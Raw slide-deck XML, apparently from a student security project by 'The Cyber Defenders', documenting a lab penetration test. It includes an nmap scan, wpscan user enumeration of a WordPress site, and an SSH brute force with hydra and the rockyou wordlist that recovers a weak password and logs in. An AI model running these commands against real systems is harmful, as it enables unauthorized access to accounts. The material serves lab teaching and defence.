                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-463550" lvl="7" marL="3657600">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-463550" lvl="8" marL="4114800">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="■"/>
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Google Shape;12;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22587337" y="12435245"/>
            <a:ext cx="1462800" cy="1049700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="243750" lIns="243750" spcFirstLastPara="1" rIns="243750" wrap="square" tIns="243750">
            <a:norm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192.168.1.110/wordpres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20.jp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4.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.jp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7.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId5"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hyperlink" Target="https://wordpress.org/plugins/sucuri-scanner/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId5"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hyperlink" Target="http://detectportal.firefox.com/success.txt" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://mysocalledchaos.com/wp-content/upload/2018/02/Beauty.jpg" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.assoc-amazon.com/s/ads.js" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.iphonehacks.com/jailbreak-ios-1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6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hyperlink" Target="http://31.7.62.214/fakeurl.htm" TargetMode="Externa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hyperlink" Target="http://publicdomaintorrents.info/grabs/bettybooprythmonthereservationgrab.jpg" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.jpg"/><Relationship Id="rId5"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65.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hyperlink" Target="http://205.185.125.104/files/june11.dll" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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6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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731377" y="4318542"/>
            <a:ext cx="22914900" cy="21129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By The Cyber Defenders</a:t>
            </a:r>
            <a:endParaRPr sz="6800">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="6800">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David Mahanes, Alison Meehan, </a:t>
            </a:r>
            <a:endParaRPr sz="6800">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Tony Null, and Saad Yaldram </a:t>
            </a:r>
            <a:endParaRPr sz="6800">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;107;p1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Exploitation: V1 “Open access to SSH 22”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="Google Shape;187;p2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88" name="Google Shape;188;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="11547900" cy="108174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3200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Summarize the following:</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How did you exploit the vulnerability?</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We first scanned the network using nmap on Kali machine (192.168.1.90/24)</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@Kali:~# nmap 192.168.1.90/24</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What did the exploit achieve? </a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It enumerated the open ports and services of the listed machines on the network. Target one machine has port 22 open. This was the gateway way to exploit for an attack. </a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="189" name="Google Shape;189;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13253075" y="1675225"/>
            <a:ext cx="10393126" cy="11543975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="190" name="Google Shape;190;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767626" y="8765575"/>
            <a:ext cx="4485450" cy="445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Exploitation: V2 “Enumerate usernames in WordPress”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="Google Shape;196;p2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97" name="Google Shape;197;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22817100" cy="10817400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="2437975" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="0">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find users/authors of this WordPress website can help attackers craft an approach as part of a larger attack.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-469900" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What did the exploit achieve?</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-469900" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WPScan version 3.7.8</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-469900" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WPScan returns: WordPress version 4.8.15 is used on this website.</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-469900" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Research known vulnerabilities of version 4.8.15</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-469900" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enumerate Users via “Author ID Brute Forcing”</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-469900" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How did you exploit the vulnerability?</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-469900" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Users(s) Identified: steven &amp; michael</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-469900" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Confirmed by: Login Error Messages </a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-469900" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800"/>
              <a:t>Command:</a:t>
            </a:r>
            <a:endParaRPr sz="3800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-469900" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wpscan --url </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://192.168.1.110/wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --enumerate u</a:t>
            </a:r>
            <a:endParaRPr sz="38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Exploitation: V2 “Enumerate usernames in WordPress”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="Google Shape;203;p2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204" name="Google Shape;204;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22817100" cy="108174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2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WPScan determines WordPress version 4.8.7 is vulnerable to “Author ID Brute Forcing” attacks.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="205" name="Google Shape;205;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="594477" y="2754450"/>
            <a:ext cx="10347259" cy="10358350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="206" name="Google Shape;206;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10941726" y="2754451"/>
            <a:ext cx="13060526" cy="687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sz="5300"/>
              <a:t>Exploitation: V3 “User ID Susceptible to Brute Force Attacks (CWE-307)”</a:t>
            </a:r>
            <a:endParaRPr sz="5300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="Google Shape;212;p3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213" name="Google Shape;213;p3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77500" lnSpcReduction="20000"/>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445135" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How did you exploit the vulnerability? </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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Using xHydra software -- a network logon cracker</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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SSH brute force attack on Apache server</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-445135" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What did the exploit achieve? </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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User Michael password found.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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Password: “michael”</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-445135" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command:</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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hydra -s 22-l michael -P /usr/share/wordlists/rockyou.txt -t16 192.168.1.110 ssh</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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ssh login command: root@Kali:~# ssh 192.168.1.110 -l michael</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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michael@192.168.1.110’s password: “michael”</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="214" name="Google Shape;214;p30"/>
